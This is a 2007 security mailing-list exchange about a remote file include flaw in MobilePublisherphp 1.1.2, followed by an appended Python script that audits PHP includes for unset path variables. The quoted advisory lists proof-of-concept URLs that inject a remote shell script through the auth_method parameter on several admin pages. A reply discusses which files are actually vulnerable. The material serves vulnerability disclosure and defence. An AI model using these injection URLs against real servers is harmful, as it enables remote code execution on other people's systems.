[VIM] true until installed: MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities
str0ke
str0ke at milw0rm.com
Sat Apr 14 17:19:04 UTC 2007
Once the product is installed it doesn't seem vulnerable since

require "../config.php";

contains the $auth_method variable.

After checking header.php in the root directory (the second included
file) it does seem vulnerable to RFI.

<?php
error_reporting (E_ALL & ~E_NOTICE);
$server = substr_replace($HTTP_SERVER_VARS[SERVER_SOFTWARE], '', 3, 50);
$mtime1 = explode(" ", microtime());
$starttime = $mtime1[1] + $mtime1[0];
require $abspath."/functions.php";

Then again this is a past vulnerability found by Timq.
http://www.milw0rm.com/exploits/2383

/str0ke

On 14 Apr 2007 06:36:31 -0000, the_3dit0r at yahoo.com
<the_3dit0r at yahoo.com> wrote:
> Xmor$ Security Vulnerability Research TM
>
>
> # Title: MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities
>
>
> # Author..................: [the_Edit0r]
> # HomePage ...............: [Www.XmorS-sEcurity.coM]
> # Location ...............: [Iran]
> # Software ...............: [MobilePublisherphp]
> # Impact..................: [ Remote ]
> # Site Script ............: [http://sourceforge.net/projects/mpphp/]
> # We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]
>
>
>
>
>
> ------------------------------- proof Of Concept ---------------------------
>
>
>
> www.example.com/[path]/admin/index.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/list.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/postreview.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/reindex.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/sections.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/templates.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/userinfo.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/users.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/view.php?auth_method=[Shell-Script]
>
>
> ----------------------------------------------------------------------------
>
>
>
>
>
> # Contact me : the_3dit0r[at]Yahoo[dot]coM
>
> # [XmorS-SEcurity.coM]
>
>
>
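
Added example, not part of the original posts or of the MobilePublisherphp code: a small Python audit that flags include/require statements whose path uses a variable with no assignment earlier in the same file, which is the pattern str0ke points out in header.php. The admin script and the fixed header below are constructed for illustration (the page does not show those lines); the function and constant names are this example's own.

```python
import re

# include/require[_once] statement; group 1 is the path expression up to ';'
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\b\s*\(?([^;]*);', re.I)
VAR_RE = re.compile(r'\$([A-Za-z_]\w*)')
# plain assignment "$x =", excluding "==" and "=>"
ASSIGN_RE = re.compile(r'\$([A-Za-z_]\w*)\s*=(?![=>])')

# header.php excerpt as quoted in the message above
HEADER_PHP = """<?php
error_reporting (E_ALL & ~E_NOTICE);
$server = substr_replace($HTTP_SERVER_VARS[SERVER_SOFTWARE], '', 3, 50);
$mtime1 = explode(" ", microtime());
$starttime = $mtime1[1] + $mtime1[0];
require $abspath."/functions.php";
"""

# Constructed sample: hypothetical admin script whose include path depends
# on $auth_method, which is only defined inside config.php
ADMIN_PHP = """<?php
require "../config.php";
require "../auth/".$auth_method.".php";
"""

# Constructed sample: header.php with the base path set by the script itself
FIXED_PHP = """<?php
$abspath = dirname(__FILE__);
require $abspath."/functions.php";
"""

def audit_includes(source):
    """Return [(line_no, variable)] for include/require paths that use a
    variable not assigned earlier in the same file (line-based heuristic)."""
    assigned, findings = set(), []
    for line_no, line in enumerate(source.splitlines(), 1):
        match = INCLUDE_RE.search(line)
        if match:
            for var in VAR_RE.findall(match.group(1)):
                if var not in assigned:
                    findings.append((line_no, var))
        # record assignments after the check so order within the file matters
        assigned.update(ASSIGN_RE.findall(line))
    return findings

if __name__ == "__main__":
    samples = (("header.php", HEADER_PHP), ("admin script", ADMIN_PHP),
               ("fixed header.php", FIXED_PHP))
    for name, src in samples:
        print(name, audit_includes(src))
```

The check is per file and line-based, so a finding such as auth_method means the reviewer still has to confirm that the included config.php always defines the variable before it is used, which is the installed versus not-installed difference described above.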